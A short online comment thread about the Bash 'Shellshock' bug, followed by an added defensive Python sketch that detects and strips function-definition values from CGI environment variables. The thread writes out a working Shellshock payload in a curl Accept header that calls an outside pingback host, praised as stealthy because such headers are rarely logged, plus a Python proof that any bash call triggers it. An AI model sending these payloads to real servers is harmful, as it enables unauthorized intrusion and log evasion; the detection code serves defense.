by gwillem 4282 days ago
This is quite a stealthy way to scan, as Accept headers are generally not logged:

    curl -H 'Accept: () { :;}; /usr/bin/curl -so /dev/null http://my.pingback.com' 
Found nothing so far though. IMHO the number of Bash CGI scripts in the wild must be pretty low.
3 comments

Maybe the bash is invoked on some other request path, not just / which you are scanning.

I would go with /login and such, or write a crawler to parse out where the login/logout URLs are and try those.

Would disabling CGI, e.g. adding Option -ExecCGI to httpd.conf for Apache, prevent exploitation via the web server?

    import os
    os.putenv("ANYTHING", "() { :;}; echo bu")
    os.system("bash")

If this works (and it does) that means it's enough for a CGI script to invoke bash. It doesn't even have to be written in bash.
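
An added illustration, not part of the thread: the comments above depend on the web server copying request headers such as Accept into the CGI environment, where any bash started by the script then parses them. The sketch below flags and drops such values before a child process inherits them; the function names and sample headers are constructed for this example.

```python
import re

# Unpatched bash imported any environment value starting with the exact
# four bytes "() {" as a function definition and kept parsing past the
# closing brace. The pattern here is deliberately looser about whitespace.
FUNC_PREFIX = re.compile(r"^\s*\(\s*\)\s*\{")


def cgi_environ(headers):
    """Map request headers to CGI meta-variables as RFC 3875 describes:
    'Accept' becomes HTTP_ACCEPT, 'User-Agent' becomes HTTP_USER_AGENT."""
    env = {}
    for name, value in headers.items():
        key = name.upper().replace("-", "_")
        if key not in ("CONTENT_TYPE", "CONTENT_LENGTH"):
            key = "HTTP_" + key
        env[key] = value
    return env


def suspicious_vars(env):
    """Return sorted names of variables whose value looks like a function definition."""
    return sorted(k for k, v in env.items() if FUNC_PREFIX.match(v))


def scrub(env):
    """Drop flagged variables before any child process (and so any bash) inherits them."""
    bad = set(suspicious_vars(env))
    return {k: v for k, v in env.items() if k not in bad}


# Constructed sample request headers (not captured traffic).
SAMPLE = {
    "Host": "example.test",
    "User-Agent": "Mozilla/5.0",
    "Accept": "() { :;}; echo probe",
    "Cookie": "session=() not a function",
}

if __name__ == "__main__":
    env = cgi_environ(SAMPLE)
    print("flagged:", suspicious_vars(env))
    print("passed on:", sorted(scrub(env)))
```

Because the match is on the environment value rather than on an access-log line, it also covers headers that are not logged.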